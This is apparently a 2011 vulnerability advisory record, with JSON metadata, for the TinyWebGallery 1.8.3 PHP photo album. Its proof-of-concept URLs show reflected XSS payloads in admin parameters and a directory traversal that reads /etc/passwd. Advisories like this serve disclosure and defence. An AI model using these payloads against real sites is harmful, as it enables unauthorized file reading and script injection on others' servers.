ID MYHACK58:62201128979Type myhack58Reporter 佚名Modified 2011-02-04T00:00:00
Description
TinyWebGallery is a php photo album program, TinyWebGallery 1.8.3 contains multiple security vulnerabilities, including directory traversal andXSS , may lead to sensitive information disclosure.
[+]info:
~~~~~~~~~
Script: TinyWebGallery
Version: 1.8.3 (No fixes yet, might work on other versions too).
Home: http://www.tinywebgallery.com
[+]poc:
~~~~~~~~~
http://localhost/twg183/admin/index.php?sview="onmouseover=alert(String. fromCharCode(88,83,83));"
http://localhost/twg183/admin/index.php?tview="onmouseover=alert(String. fromCharCode(88,83,83));"
http://localhost/twg183/admin/index.php?dir=<script>alert("xss ")</script>
http://localhost/twg183/admin/index.php?action=chmod&item=<script>alert("xss ")</script>
http://localhost/twg183/twg183/admin/index.php?action=chmod&item="><script>alert("xss ")</script>
http://localhost/twg183/admin/index.php?action=edit&item=../../../etc/passwd
[+]Reference:
~~~~~~~~~
http://www.exploit-db.com/exploits/16090
{"hash": "8bdc4fa30f42ee0b9233599d9f8d6a05c486252ab7aef51618a62853acf77327", "id": "MYHACK58:62201128979", "modified": "2011-02-04T00:00:00", "history": [], "published": "2011-02-04T00:00:00", "type": "myhack58", "edition": 1, "references": [], "objectVersion": "1.2", "href": "http://www.myhack58.com/Article/html/3/62/2011/28979.htm", "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "vulnersScore": 5.0}, "cvelist": [], "title": "TinyWebGallery 1.8.3 version multiple vulnerabilities-vulnerability warning-the black bar safety net", "hashmap": [{"hash": "caf9b6b99962bf5c2264824231d7a40c", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "43d14a68e65cda8dbac32e48f14d5792", "key": "description"}, {"hash": "351115df0820c6132c0c2bc7b5652d87", "key": "href"}, {"hash": "137d35f4e9efd8e88a7eefc8ee8b417d", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "137d35f4e9efd8e88a7eefc8ee8b417d", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "645396391020478112635e14b34a0f8b", "key": "reporter"}, {"hash": "6ff8908dcc6fcd3e2e4b1b21ac310398", "key": "title"}, {"hash": "0665a8b0792e65b50ab13aef58a018dc", "key": "type"}], "viewCount": 0, "description": "TinyWebGallery is a php photo album program, TinyWebGallery 1.8.3 contains multiple security vulnerabilities, including directory traversal and[XSS](<http://www.myhack58.com/Article/html/3/7/Article_007_1.htm>), may lead to sensitive information disclosure. \n\n[+]info: \n~~~~~~~~~ \nScript: TinyWebGallery \nVersion: 1.8.3 (No fixes yet, might work on other versions too). \nHome: http://www.tinywebgallery.com \n\n[+]poc: \n~~~~~~~~~ \nhttp://localhost/twg183/admin/index.php?sview=\"onmouseover=alert(String. fromCharCode(88,83,83));\" \nhttp://localhost/twg183/admin/index.php?tview=\"onmouseover=alert(String. fromCharCode(88,83,83));\" \nhttp://localhost/twg183/admin/index.php?dir=<script>alert(\"[xss](<http://www.myhack58.com/Article/html/3/7/Article_007_1.htm>)\")</script> \nhttp://localhost/twg183/admin/index.php?action=chmod&item=<script>alert(\"[xss](<http://www.myhack58.com/Article/html/3/7/Article_007_1.htm>)\")</script> \nhttp://localhost/twg183/twg183/admin/index.php?action=chmod&item=\"><script>alert(\"[xss](<http://www.myhack58.com/Article/html/3/7/Article_007_1.htm>)\")</script> \n\nhttp://localhost/twg183/admin/index.php?action=edit&item=../../../etc/passwd \n\n[+]Reference: \n~~~~~~~~~ \nhttp://www.exploit-db.com/exploits/16090 \n", "bulletinFamily": "info", "reporter": "\u4f5a\u540d", "cvss": {"vector": "NONE", "score": 0.0}, "lastseen": "2016-11-15T18:01:37"}
{}
